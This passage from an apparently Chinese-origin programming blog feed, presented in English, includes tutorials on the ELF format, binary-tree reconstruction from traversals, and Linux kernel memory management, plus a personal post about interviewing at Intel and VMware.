root = create_node();
for (vector<string>::iterator it = words.begin(); it != words.end(); ++it)
{
insert_node(*it, it - words.begin());
}
}
void WordPuzzles :: insert_node(string word, int num)
{
Node *q = root;
for (int i = 0; i < word.size(); ++i)
{
int index = word[i] - 'A';
if (q->child[index] == NULL)
{
q->child[index] = create_node();
}
q = q->child[index];
}
q->data = num;
}
void WordPuzzles::search_words(int x,int y,int dir)
{
Node *q = root;
int xtmp = x, ytmp = y;
while (xtmp >= 0 && xtmp < row && ytmp >= 0 && ytmp < col)
{
if (!q->child[wordmap[xtmp][ytmp] - 'A'])
break;
else
q = q->child[wordmap[xtmp][ytmp] - 'A'];
if (q->data != -1)
{
ans.push_back(make_tuple(q->data,x, y, dir));
q->data = -1;
}
xtmp += dx[dir];
ytmp += dy[dir];
}
}
void WordPuzzles::do_work()
{
for (int i = 0; i < row; ++i)
{
for (int j = 0; j < col; ++j)
{
for (int k = 0; k < 8; ++k)
search_words(i, j, k);
}
}
sort(ans.begin(), ans.end(),
[](const tuple<int, int, int, char>& a, const tuple<int, int, int, char> &b)
{
return get<0>(a) < get<0>(b);
});
for (auto &it : ans)
{
cout << get<1>(it) << " " << get<2>(it) << " " << (char)(get<3>(it) +'A') << endl;
}
}
int main()
{
ifstream in("word.txt");
WordPuzzles wp(in);
wp.do_work();
}
</code></pre></div></div>
An introduction to the ELF file format2014-11-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/11/02/elf
<p>ELF stands for Executable and Linkable Format. It is a file format used for executables, object files, and libraries, similar to the PE format on Windows. ELF was developed and published by UNIX System Laboratories as part of the ABI (Application Binary Interface) and has long been the standard format on Linux.
This article walks through the ELF format using the simple program below; I recommend reading it alongside the program's binary.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
int add(int a,int b)
{
printf("Number are added together\n");
return a + b;
}
int main()
{
int a,b;
a = 3;
b = 4;
int ret = add(a,b);
printf("Result:%u\n",ret);
exit(0);
}
gcc test.c -o test
gcc test.c -c -o test.o
</code></pre></div></div>
<h3>一. ELF overview</h3>
<p>ELF covers three main file types:</p>
<ul>
<li>Relocatable files: the .o files produced by the compiler and assembler, later processed by the linker</li>
<li>Executable files: the linker's output from processing .o files; the process image</li>
<li>Shared object files: dynamic libraries, the .so files</li>
</ul>
<p>Examples of the three types:</p>
<p><img src="/assets/img/elf/1.png" alt="" /></p>
<p>The ELF layout is as follows:</p>
<p><img src="/assets/img/elf/2.png" alt="" /></p>
<p>As the figure shows, an ELF file conceptually consists of five parts:</p>
<ul>
<li>
<p>ELF header: describes basic information such as the architecture and operating system, and gives the locations of the section header table and the program header table within the file</p>
</li>
<li>
<p>program header table: views the ELF file from the execution perspective, giving information about each segment; unused during assembly and linking</p>
</li>
<li>
<p>section header table: holds information about all sections, viewing the ELF file from the compilation and linking perspective</p>
</li>
<li>
<p>sections: the individual sections</p>
</li>
<li>
<p>segments: the segments at run time</p>
</li>
</ul>
<p>Note that, as explained above, sections and segments actually occupy the same bytes; the difference is one of perspective, linking versus loading. The left side of the figure is the linking view and the right side is the loading view: sections are visible to the programmer and are a concept for the linker, while segments are invisible to the programmer and are a concept for the loader. A segment usually contains several sections. Windows PE has neither a program header table nor a section header table: everything is unified as sections, which are simply processed at load time. Accordingly, both the program header table and the section header table are optional.</p>
<h3>二. The structure of an ELF file</h3>
<p>Before going through each part, here are the sizes of the data types used in the definitions below.</p>
<p><img src="/assets/img/elf/3.png" alt="" /></p>
<h4>(1) ELF header</h4>
<p>The ELF header describes basic information such as the architecture and operating system, and records where the section header table and the program header table live in the file. See the comments below for the meaning of each member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define EI_NIDENT 16
typedef struct{
/* ELF identification bytes, fixed values */
unsigned char e_ident[EI_NIDENT];
/* object file type: 1 - relocatable, 2 - executable, 3 - shared object, ... */
Elf32_Half e_type;
/* target architecture: 3 - Intel 80386 */
Elf32_Half e_machine;
/* object file version: 1 - current version */
Elf32_Word e_version;
/* virtual address of the program entry point; 0 if there is none */
Elf32_Addr e_entry;
/* file offset of the program header table (segment header table); 0 if there is none */
Elf32_Off e_phoff;
/* file offset of the section header table; 0 if there is none */
Elf32_Off e_shoff;
/* processor-specific flags associated with the file */
Elf32_Word e_flags;
/* size of the ELF header, in bytes */
Elf32_Half e_ehsize;
/* size of each program header table entry, in bytes */
Elf32_Half e_phentsize;
/* number of program header table entries */
Elf32_Half e_phnum;
/* size of each section header table entry, in bytes */
Elf32_Half e_shentsize;
/* number of section header table entries */
Elf32_Half e_shnum;
/* index of the section name string table (.shstrtab) in the section header table */
Elf32_Half e_shstrndx;
}Elf32_Ehdr;
</code></pre></div></div>
<p>A quick note on the last field: e_shstrndx, the last member of Elf32_Ehdr, is short for “section header string table index”. The section name string table is itself an ordinary section of the ELF file, usually called “.shstrtab”; e_shstrndx is simply the index of “.shstrtab” within the section header table.</p>
<p>Below are the values of each ELF header member for test:</p>
<p><img src="/assets/img/elf/4.png" alt="" /></p>
<p>Here we can read the file's basic information, such as the architecture and operating system: the section header table holds 30 sections starting at offset 4420, 40 bytes each, and the program header table holds 9 segments, 32 bytes each. Next, the same thing in raw bytes; some structures are marked so you can match them against the definitions above.</p>
<p><img src="/assets/img/elf/5.png" alt="" /></p>
<h4>(2) Program header table and program header entries</h4>
<p>The program header table views the ELF file from the loading perspective; object files do not have one. Each entry gives a segment's size and location in the virtual and physical address spaces, its flags, access permissions, and alignment. As shown above, test has 9 segments:</p>
<p><img src="/assets/img/elf/6.png" alt="" /></p>
<p>A brief description of some of them:</p>
<ul>
<li>PHDR holds the program header table itself</li>
<li>INTERP names the interpreter that must be invoked once the program has been mapped from the executable into memory. Here “interpreter” does not mean the binary's contents are interpreted by another program; it refers to a program that resolves outstanding references by linking in other libraries. Typically this is /lib/ld-linux.so.2, /lib/ld-linux-ia-64.so.2, or similar, which maps the dynamic libraries the program needs into the virtual address space. For almost every program the C standard library must be mapped, plus whatever else is required: GTK, the math library, libjpeg, and so on</li>
<li>LOAD marks a segment that must be mapped from the binary into the virtual address space, holding constant data (such as strings), the program's object code, and so on.</li>
<li>DYNAMIC holds information used by the dynamic linker (i.e., the interpreter named in INTERP).</li>
<li>NOTE holds vendor-specific information</li>
</ul>
<p>Each entry describes one segment and is represented by the following structure:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct
{
/* segment type: PT_LOAD = 1, a loadable segment */
Elf32_Word p_type;
/* offset of the segment's first byte from the start of the file */
Elf32_Off p_offset;
/* virtual address at which the segment's first byte is placed in memory */
Elf32_Addr p_vaddr;
/* meaningless on Linux; same value as p_vaddr */
Elf32_Addr p_paddr;
/* size of the segment in the file image, in bytes */
Elf32_Word p_filesz;
/* size of the segment in the memory image, in bytes */
Elf32_Word p_memsz;
/* segment flags */
Elf32_Word p_flags;
/* alignment of p_vaddr */
Elf32_Word p_align;
} Elf32_Phdr;
</code></pre></div></div>
<h4>(3) Section header table and section header entries</h4>
<p>The section header table lists the sections in the file. Each section has a type defining the semantics of its data, along with a size and an offset within the binary. As shown above, test has 30 sections:</p>
<p><img src="/assets/img/elf/7.png" alt="" /></p>
<p>A brief description of some of them:</p>
<ul>
<li>.interp holds the file name of the interpreter, an ASCII string</li>
<li>.data holds initialized data; it is part of ordinary program data and may be modified at run time</li>
<li>.rodata holds read-only data, which can be read but not modified; for example, the compiler places all static strings appearing in printf statements into this section</li>
<li>.init and .fini hold the code used for process initialization and termination; both are usually added automatically by the compiler</li>
<li>.gnu.hash is a hash table that allows fast access to all symbol table entries without a linear search of the whole table</li>
</ul>
<p>The section header structure is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct{
/* section name */
Elf32_Word sh_name;
/* section type: PROGBITS - program-defined information, NOBITS - occupies no file space (bss), REL - relocation entries */
Elf32_Word sh_type;
/* one bit per attribute: whether the section is writable, executable, etc. */
Elf32_Word sh_flags;
/* if the section appears in the process memory image, the address of its first byte */
Elf32_Addr sh_addr;
/* offset of the section's first byte from the start of the file */
Elf32_Off sh_offset;
/* section size in bytes; for NOBITS this may be nonzero yet occupy no file space */
Elf32_Word sh_size;
/* section header table index link */
Elf32_Word sh_link;
/* extra section information */
Elf32_Word sh_info;
/* address alignment constraint of the section */
Elf32_Word sh_addralign;
/* for sections holding fixed-size entries, such as a symbol table, the size of each entry */
Elf32_Word sh_entsize;
}Elf32_Shdr;
</code></pre></div></div>
<p>That is the rough structure of ELF; when time permits I will summarize a few of the more important section tables.</p>
Reconstructing a binary tree from its traversal sequences2014-10-30T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/30/binary-tree-traversals
<p>Binary tree traversal generally comes in three flavors (preorder, inorder, postorder); the question here is how to determine the tree from any two of the sequences. In general, “preorder + inorder” and “inorder + postorder” each uniquely determine the tree, while “preorder + postorder” does not. <a href="http://www.binarythink.net/2012/12/binary-tree-info-theory/">This article</a> gives a qualitative explanation from an information-theoretic angle. (Most of what follows is collected from around the web; I have merely combined it.)</p>
<p>The three cases are discussed below.</p>
<p>一. Given the preorder and inorder sequences</p>
<p>1. Determine the root: it is the element of the current tree that appears first in the preorder sequence.</p>
<p>2. Split into subtrees: find the root's position in the inorder sequence; everything to its left is the left subtree and everything to its right is the right subtree. If either side is empty, that subtree is empty; if both sides are empty, the root is already a leaf.</p>
<p>3. Recurse: treat the left and right subtrees as binary trees in their own right and repeat steps 1-3 until every node has been placed.</p>
<p>二. Given the postorder and inorder sequences</p>
<p>1. Determine the root: it is the element of the current tree that appears last in the postorder sequence.</p>
<p>2. Split into subtrees: find the root's position in the inorder sequence; everything to its left is the left subtree and everything to its right is the right subtree. If either side is empty, that subtree is empty; if both sides are empty, the root is already a leaf.</p>
<p>3. Recurse: treat the left and right subtrees as binary trees in their own right and repeat steps 1-3 until every node has been placed.</p>
<p>The code is below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdlib.h>
#include <stdio.h>
#include <string.h>
typedef struct _node
{
int v;
struct _node* left;
struct _node* right;
}node;
char pre[50] = "ABDHLEKCFG";
char mid[50] = "HLDBEKAFCG";
char post[50] = "LHDKEBFGCA";
int Possition(char c)
{
return strchr(mid,c) - mid;
}
node* root1; // made global mainly to ease debugging
node* root2;
// i: index in pre[] of the first character of the subtree's preorder sequence
// j: index in mid[] of the first character of the subtree's inorder sequence
// len: length of the subtree's sequence
void PreMidCreateTree(node **root,int i,int j,int len)
{
int m;
if(len <= 0)
return;
*root = (node*)malloc(sizeof(node));
(*root)->v = pre[i];
(*root)->left = NULL;
(*root)->right = NULL;
m = Possition(pre[i]);
PreMidCreateTree(&((*root)->left),i+1,j,m-j); // be very careful choosing the recursion bounds
PreMidCreateTree(&((*root)->right),i+(m-j)+1,m+1,len-1-(m-j));
}
// i: index in post[] of the last character of the subtree's postorder sequence
// j: index in mid[] of the first character of the subtree's inorder sequence
// len: length of the subtree's sequence
void MidPostCreateTree(node **root,int i,int j,int len)
{
int m;
if(len <= 0)
return;
*root = (node*)malloc(sizeof(node));
(*root)->v = post[i];
(*root)->left = NULL;
(*root)->right = NULL;
m = Possition(post[i]);
MidPostCreateTree(&((*root)->left),i-1-(len-1-(m-j)),j,m-j);
MidPostCreateTree(&((*root)->right),i-1,m+1,len-1-(m-j));
}
void PreOrder(node *root)
{
if(root)
{
printf("%c",root->v);
PreOrder(root->left);
PreOrder(root->right);
}
}
void PostOrder(node *root)
{
if(root)
{
PostOrder(root->left);
PostOrder(root->right);
printf("%c",root->v);
}
}
int main()
{
node *root2= NULL;
PreMidCreateTree(&root1, 0, 0, strlen(mid));
PostOrder(root1);
printf("\n");
MidPostCreateTree(&root2, strlen(post)-1, 0, strlen(mid));
PreOrder(root2);
printf("\n");
return 0;
}
</code></pre></div></div>
<p>三. Given the preorder and postorder sequences</p>
<p>In this case the tree is generally not unique, but we can count how many tree shapes are possible.</p>
<p>The idea, on a small example first: preorder ABCD, postorder CBDA.</p>
<p>(1) The first letter of the preorder sequence and the last letter of the postorder sequence must both be the root, i.e., A.</p>
<p>(2) The second letter of the preorder, B, must also be the root of some subtree (left or right cannot be determined). B must then appear at the end of its subtree in the postorder sequence, so by locating B in the postorder we obtain all the nodes of the left subtree, namely B and C; the remaining D is the node of the right subtree.</p>
<p>(3) Analyze the left subtree BC and the right subtree D the same way. D is a lone root, so its shape is unique; BC has only one child subtree, which could hang on either the left or the right.</p>
<p>(4) Finally, count the nodes that have exactly one child subtree (say n); the answer is pow(2, n).</p>
<p>Now generalize to arbitrary binary trees.</p>
<p>First set up a few variables:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pre[50]; // preorder array
post[50]; // postorder array
length; // array length
count; // number of nodes that have exactly one child subtree
</code></pre></div></div>
<p>(1) If length == 1, the result is obviously unique.</p>
<p>(2) With more than one node there are subtrees, and necessarily pre[0] == post[length-1]. If pre[1] == post[length-2], then positions 1 through length-1 all belong to a single subtree of pre[0]; whether it is the left or right subtree cannot be determined, so count++. Then process pre[1] through pre[length-1] together with post[0] through post[length-2] as a new tree.</p>
<p>(3) If pre[1] != post[length-2], there are clearly both left and right subtrees (split post at the position equal to pre[1]); process each subtree as an independent tree.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char pre[50];//= "ABDHLEKCFG";
char mid[50];//= "HLDBEKAFCG";
char post[50];//= "LHDKEBFGCA";
int count;
void calc(int prebeg,int preend,int postbeg,int postend)
{
int i;
if(prebeg>=preend)
return;
for(i = postbeg; i <= postend - 1; ++i)
{
if(pre[prebeg+1]==post[i])
break;
}
if(i == postend - 1)
count++;
calc(prebeg+1,prebeg+1+(i-postbeg),postbeg,i);
calc(prebeg+1+(i-postbeg)+1,preend,i+1,postend-1);
}
int Pow(int n)
{
int i;
int m = 1;
for(i = 0; i < n; i++)
{
m *= 2;
}
return m;
}
int main()
{
int length;
scanf("%s", pre);
scanf("%s", post);
length = strlen(pre);
count = 0;
calc(0,length-1,0,length-1);
printf("%d\n", Pow(count));
return 0;
}
</code></pre></div></div>
Notes on interviewing at Intel and VMware2014-10-29T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/10/29/bishimianshi
<p>Last Tuesday (Oct 21) I went back to campus and happened to spot Intel's written-test notice at the school gate; it said just bring Chinese and English resumes. Since I start working next year anyway, I figured I would go have a look; foreign companies recruit interns all year round, so maybe I could land an internship.</p>
<p>Few people sat Intel's written test, presumably because they were hiring few and barely advertised. The test was in Chinese and very basic, clearly low-level stuff: pure C, simple system facts like ring 0 versus ring 3, basic algorithm questions; the bonus question was in English and also easy. The interview the next day went smoothly. The interviewer wasn't familiar with virtualization, so I spent a long while explaining Xen and KVM to him. He seemed more interested in exploitation, so we moved on to Windows exploit development and mitigations. At one point he said, “I won't bother asking you about operating systems,” and I said, “as you like.” I was brimming with confidence throughout. He was quite satisfied and said an intern offer would be no problem, then briefed the manager about me. The manager wanted a chat in English, and my spoken English is hopeless; luckily the topic was technical and I scraped through. As I left, the manager said she would notify me when a suitable internship came up. I assumed that was the end of it, given how little faith I have in my spoken English, but the very next day Intel HR got in touch: calls from Malaysia, Dalian, and Shanghai. I remember thinking how complicated foreign companies are. Later I learned the Shanghai caller was the manager; she asked why I was applying so early (I can only start next year) and mentioned they have campus-hire headcount too. Intel is remarkably efficient: test on Tuesday, interview on Wednesday, notice on Thursday, and then it was all process; even the physical exam was scheduled for me. So the internship is basically settled at Intel.</p>
<p>Now for VMware, a company I have always admired. As the underlying platform for cloud computing, virtualization looks very promising to me for the next few years. I attended VMware's campus recruiting last year: being only a first-year grad student I could neither work nor intern, yet I coasted into the second round, admitted I wasn't graduating, and the interviewers let it slide, telling me to try again for an internship later. VMware's written test is entirely in English, fairly comprehensive and challenging; this year it even covered the Shellshock vulnerability. My fundamentals carried me through the multiple-choice part, but this time there were two coding problems I couldn't do. I assumed I had failed the written test, yet on Monday I was notified to interview today. The interview went badly, which is what prompted this post. I felt half-asleep all morning: I wrote a memcpy without even checking for NULL pointers, embarrassing. I said I had done Windows kernel driver development, so the interviewer immediately asked about the Windows boot process, and I stumbled; I had genuinely forgotten parts of it, since my previous work leaned toward security and I had never studied that closely. Things felt off from then on. Asked to explain kernel NULL-pointer dereferences, I was imprecise; I wasn't even confident stating that when the exception occurs, a bit in the error code pushed onto the stack indicates where it happened (kernel mode or user mode). All in all I performed very poorly, my worst interview in years. VMware is probably a bust; remembering how confident I was in last year's first and second rounds, it is quite the irony.</p>
<p>Of these two interviews, one went more smoothly than I could have imagined and the other more miserably. The smooth one needs no comment; the VMware fiasco tells me I still have to prepare properly. These years of effort have not been wasted, but I must learn to express it. Honestly, a setback like this, right when everything seemed to be going my way, is a good thing. Onward.</p>
An overview of Linux memory management2014-10-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/12/linux-vm-overview
<h3>一. The Linux kernel address space split</h3>
<p>Linux splits the 4 GB virtual address space so that the low 3 GB goes to user processes and the high 1 GB to the kernel. While the low part changes on a context switch (between two user processes), the kernel's high part always stays the same. The MMU always works with virtual addresses, and the kernel is no exception. For simplicity, Linux maps physical memory starting at 0 directly to the start of its virtual range, 0xc0000000, which is convenient: using 0xc0000001 in the kernel amounts to accessing physical byte 1. The problem is that the kernel can directly address only 1 GB of virtual space, so even with everything mapped it can reach at most 1 GB of physical memory; on a system with more than 1 GB, at any given moment part of physical memory is out of the kernel's direct reach. Besides memory, the kernel must access many I/O devices, whose resources (registers, on-chip memory, and so on) are in today's architectures generally mapped into the physical address space via MMIO; the kernel's 1 GB must therefore also reserve some virtual address space for mapping these I/O resources. Taking all this into account, the kernel directly maps only 896 MB of physical memory and reserves the top 128 MB of virtual space for other uses. When a system has more than 896 MB of memory, the excess cannot be accessed directly by the kernel; this is the so-called high memory. Is memory above 896 MB forever out of reach, then? Of course not: the reserved 128 MB of virtual addresses can be mapped dynamically onto high memory, giving the kernel access to it. So besides mapping I/O devices, an important role of the reserved 128 MB is to provide a means of accessing high memory on demand. Naturally, when physical memory is below 896 MB, say 512 MB, there is no high memory at all, because all 512 MB is directly mapped; in that case everything from 3 GB + max_phy to 4 GB serves as the reserved kernel address space described above. ULK springs the 896 MB kernel page tables on the reader right in chapter 2, which is quite confusing; it only fully makes sense once high memory is understood. Note that only the kernel itself uses high-memory pages this way: to user-space processes, high pages and normal pages are indistinguishable, since user space always accesses memory through page tables rather than directly. The figure below shows the kernel address space layout.</p>
<p><img src="/assets/img/vmoverview/1.png" alt="" /></p>
<p>PAGE_OFFSET is 0xc0000000. The first 896 MB of physical memory is mapped directly into the kernel address space; what follows is high memory, whose virtual range splits into three parts: VMALLOC_START~VMALLOC_END, KMAP_BASE~FIXADDR_START, and FIXADDR_START~4G.
For high memory, alloc_page() and similar functions return the corresponding page, but to actually access the physical memory the page must still be given a linear address: we need to find a spot in the linear address space for the page backing the high memory. This process is called high-memory mapping, covered in section three.</p>
<h3>二. Page frames and memory zones</h3>
<p>The page frame, a 4 KB memory region, is the smallest unit of Linux memory management. Each frame's information lives in a page descriptor of type page, and all page descriptors are stored in the mem_map array; note that this covers all physical memory. Memory as a whole is divided into nodes, each associated with a processor in the system and represented in the kernel by a pg_data_t instance. Nodes are further subdivided into zones. The rough structure is:</p>
<p><img src="/assets/img/vmoverview/2.png" alt="" /></p>
<p>Linux divides each node's physical memory into three zones, ZONE_DMA, ZONE_NORMAL, and ZONE_HIGHMEM, with the following ranges:</p>
<table>
<thead>
<tr>
<th style="text-align: left">Zone</th>
<th style="text-align: left">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">ZONE_DMA</td>
<td style="text-align: left">page frames below 16 MB</td>
</tr>
<tr>
<td style="text-align: left">ZONE_NORMAL</td>
<td style="text-align: left">page frames from 16 MB up to 896 MB</td>
</tr>
<tr>
<td style="text-align: left">ZONE_HIGHMEM</td>
<td style="text-align: left">page frames above 896 MB</td>
</tr>
</tbody>
</table>
<p>On x86, Linux uses the uniform memory access (UMA) model, so there is only a single node, containing all the physical memory in the system.</p>
<h3>三. Mapping high-memory page frames</h3>
<p>To let the kernel reach physical memory above 896 MB, high-memory page frames must be mapped into the kernel address space. Linux provides permanent kernel mappings, temporary kernel mappings, and non-contiguous memory allocation.</p>
<h4>Permanent kernel mappings</h4>
<p>Permanent kernel mappings let the kernel establish long-lasting mappings of high-memory frames into the kernel address space. They use a dedicated page table within the master kernel page tables, whose address is stored in the pkmap_page_table variable. The number of entries is produced by the LAST_PKMAP macro: the table holds 512 or 1024 entries depending on whether PAE is enabled, so the kernel can access at most 2 MB or 4 MB of high memory at once. The mapped linear addresses start at PKMAP_BASE. The pkmap_count array holds LAST_PKMAP counters, one per pkmap_page_table entry; a counter may be 0, 1, or greater than 1.</p>
<ul>
<li>
<p>If the counter is 0, the corresponding page table entry maps no high-memory page and is available.</p>
</li>
<li>
<p>If the counter is 1, the entry maps no high-memory page but cannot be used yet, because its TLB entry has not been flushed since its last use.</p>
</li>
<li>
<p>If the counter is n greater than 1, the entry maps a high-memory frame, meaning exactly n-1 kernel components are using the frame.</p>
</li>
</ul>
<p>To record the association between high-memory frames and the linear addresses of permanent mappings, the kernel uses the page_address_htable hash table, whose page_address_map data structures map each page frame in high memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct page_address_map {
struct page *page;
void *virtual;
struct list_head list;
};
</code></pre></div></div>
<p>The page_address() function returns the linear address of a page frame, or NULL if the frame is in high memory and not mapped. If the frame is not in high memory it computes the address via lowmem_page_address; if it is, the function searches page_address_htable via page_slot and returns the linear address if found.</p>
<p>kmap() establishes the mapping; its code follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap(struct page *page){
might_sleep();
if (!PageHighMem(page))
return page_address(page);
return kmap_high(page);
};
</code></pre></div></div>
<p>Essentially, for a page in the high-memory region it falls through to kmap_high(), which establishes the permanent kernel mapping:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap_high(struct page *page)
{
unsigned long vaddr;
/*
* For highmem pages, we can't trust "virtual" until
* after we have the lock.
*/
lock_kmap();
vaddr = (unsigned long)page_address(page);
if (!vaddr)
vaddr = map_new_virtual(page);
pkmap_count[PKMAP_NR(vaddr)]++;
BUG_ON(pkmap_count[PKMAP_NR(vaddr)] < 2);
unlock_kmap();
return (void*) vaddr;
};
</code></pre></div></div>
<h4>Temporary kernel mappings</h4>
<p>Temporary mappings bring in fix-mapped linear addresses, the last part of the first figure. A fix-mapped linear address is essentially a constant linear address such as 0xffffc000 whose corresponding physical address need not equal the linear address minus 0xc0000000; it can be established in any way. Each fix-mapped linear address thus maps one physical page frame.</p>
<p>Any high-memory frame can be mapped into the kernel address space through a “window” (a page table entry reserved for the purpose). Each CPU has its own set of 13 windows, represented by the enum km_type data structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>enum km_type {
KMAP_D(0) KM_BOUNCE_READ,
KMAP_D(1) KM_SKB_SUNRPC_DATA,
KMAP_D(2) KM_SKB_DATA_SOFTIRQ,
KMAP_D(3) KM_USER0,
KMAP_D(4) KM_USER1,
KMAP_D(5) KM_BIO_SRC_IRQ,
KMAP_D(6) KM_BIO_DST_IRQ,
KMAP_D(7) KM_PTE0,
KMAP_D(8) KM_PTE1,
KMAP_D(9) KM_IRQ0,
KMAP_D(10) KM_IRQ1,
KMAP_D(11) KM_SOFTIRQ0,
KMAP_D(12) KM_SOFTIRQ1,
KMAP_D(13) KM_SYNC_ICACHE,
KMAP_D(14) KM_SYNC_DCACHE,
KMAP_D(15) KM_UML_USERCOPY,
KMAP_D(16) KM_IRQ_PTE,
KMAP_D(17) KM_NMI,
KMAP_D(18) KM_NMI_PTE,
KMAP_D(19) KM_TYPE_NR
};
</code></pre></div></div>
<p>Every symbol in km_type except the last is an index of a fix-mapped linear address. To establish a temporary kernel mapping the kernel calls kmap_atomic(); in later kernel code, kmap_atomic() simply uses kmap_atomic_prot.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap_atomic_prot(struct page *page, enum km_type type)
{
unsigned int idx;
unsigned long vaddr;
void *kmap;
pagefault_disable();
if (!PageHighMem(page))
return page_address(page);
debug_kmap_atomic(type);
kmap = kmap_high_get(page);
if (kmap)
return kmap;
idx = type + KM_TYPE_NR * smp_processor_id();
vaddr = __fix_to_virt(FIX_KMAP_BEGIN + idx);
#ifdef CONFIG_DEBUG_HIGHMEM
BUG_ON(!pte_none(*(TOP_PTE(vaddr))));
#endif
set_pte_ext(TOP_PTE(vaddr), mk_pte(page, kmap_prot), 0);
local_flush_tlb_kernel_page(vaddr);
return (void *)vaddr;
}
</code></pre></div></div>
<h4>Non-contiguous memory allocation</h4>
<p>It is best if the kernel can find contiguous pages, since that makes allocation and release simple, but real systems are rarely so obliging: when allocating a large block, even the greatest effort may fail to find a contiguous run. In user space this is no problem, because ordinary processes are designed to use the processor's paging anyway, at some cost in speed and TLB entries.</p>
<p>The linear address space reserved for non-contiguous areas runs from VMALLOC_START to VMALLOC_END.</p>
<p>Each vmalloc sub-area is self-contained and separated from its neighbors by one memory page, similar to the boundary between the direct mapping and the vmalloc region; the gaps between different vmalloc sub-areas guard against incorrect memory accesses. Such accesses should only arise from kernel faults and should be reported via a system error message, rather than letting other parts of the kernel's data be silently modified. Because the separation is established in virtual address space, no physical pages are wasted.</p>
<p>vmalloc is the interface function kernel code uses to allocate memory that is contiguous in virtual memory but not necessarily contiguous in physical memory.
It takes a single parameter, the length of the desired area, in bytes rather than pages, as is common in user-space program design.</p>
<p>The best-known user of vmalloc is the kernel's module implementation. Modules may be loaded at any time; if a module carries a lot of data, there may be no guarantee of enough contiguous memory, especially on a system that has been running for a long while. If enough memory can be stitched together from small blocks, vmalloc will do.</p>
<p>Because pages used for vmalloc must always be mapped in the kernel address space, pages from ZONE_HIGHMEM are preferred over other zones: the kernel saves the more precious lower zones at no extra cost. vmalloc is thus one of the few cases in which the kernel uses high-memory pages for its own purposes.</p>
<p>To manage the vmalloc region of virtual memory, the kernel must track which sub-areas are in use and which are free, so it defines a vm_struct data structure and keeps all used areas on a linked list.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct vm_struct {
struct vm_struct *next;
void *addr;
unsigned long size;
unsigned long flags;
struct page **pages;
unsigned int nr_pages;
unsigned long phys_addr;
void *caller;
};
</code></pre></div></div>
<p>The kernel requests non-contiguous physical memory with vmalloc(). On success the function returns the start address of a contiguous linear area; otherwise it returns NULL. Memory from vmalloc() differs from kmalloc(): kmalloc() returns memory whose linear and physical addresses are both contiguous, whereas vmalloc() returns memory whose linear addresses are contiguous but whose physical addresses are scattered, the two linked through the kernel page tables.</p>
<p>The way vmalloc() works is easy to understand:
1. find a new contiguous range of linear addresses;
2. allocate a set of non-contiguous page frames;
3. establish the mapping between the linear range and the non-contiguous frames, i.e., update the kernel page tables.</p>
A brief introduction to the Linux process address space2014-10-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/10/linux-process-vm
<h3>一. The process address space</h3>
<p>On a 32-bit system every process can use 4 GB of virtual address space, covering both the process-private part and the kernel's: on Windows the split is 2 GB for the process and 2 GB for the kernel, while on Linux the default is 3 GB and 1 GB. Of course no process uses the whole 4 GB, so in practice only a small fraction is actually backed by memory. The process address space consists of all the linear addresses the process is allowed to use.</p>
<p>The kernel represents intervals of linear addresses through so-called memory regions, each described by a start linear address, a length, and some access rights. For efficiency, both the start address and the length must be multiples of 4096, so that the data identified by each region completely fills the page frames allocated to it. The kernel can dynamically modify a process's address space by adding or removing intervals of linear addresses.</p>
<h3>二. The memory descriptor</h3>
<p>All information related to a process's address space lives in a data structure called the memory descriptor, of type mm_struct; the mm field of the process descriptor points to it. mm_struct is defined as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct mm_struct {
struct vm_area_struct * mmap; /* list of VMAs */
struct rb_root mm_rb;
struct vm_area_struct * mmap_cache; /* last find_vma result */
unsigned long free_area_cache; /* first hole */
pgd_t * pgd;
atomic_t mm_users; /* How many users with user space? */
atomic_t mm_count; /* How many references to "struct mm_struct" (users count as 1) */
int map_count; /* number of VMAs */
struct rw_semaphore mmap_sem;
spinlock_t page_table_lock; /* Protects task page tables and mm->rss */
struct list_head mmlist; /* List of all active mm's. These are globally strung
* together off init_mm.mmlist, and are protected
* by mmlist_lock
*/
unsigned long start_code, end_code, start_data, end_data;
unsigned long start_brk, brk, start_stack;
unsigned long arg_start, arg_end, env_start, env_end;
unsigned long rss, total_vm, locked_vm;
unsigned long def_flags;
unsigned long saved_auxv[40]; /* for /proc/PID/auxv */
unsigned dumpable:1;
cpumask_t cpu_vm_mask;
/* Architecture-specific MM context */
mm_context_t context;
/* coredumping support */
int core_waiters;
struct completion *core_startup_done, core_done;
/* aio bits */
rwlock_t ioctx_list_lock;
struct kioctx *ioctx_list;
struct kioctx default_kioctx;
};
</code></pre></div></div>
<p>Some of the more important fields:</p>
<ul>
<li>mmap: head of the linked list of memory region objects, covered in the next section.</li>
<li>mm_rb: root of the red-black tree of memory region objects. mmap and mm_rb describe the same objects, namely all the memory regions of the address space: mmap points to a list of vm_area_struct structures, good for simple, efficient traversal of all elements, while mm_rb points to a red-black tree node, suited to finding a specific element.</li>
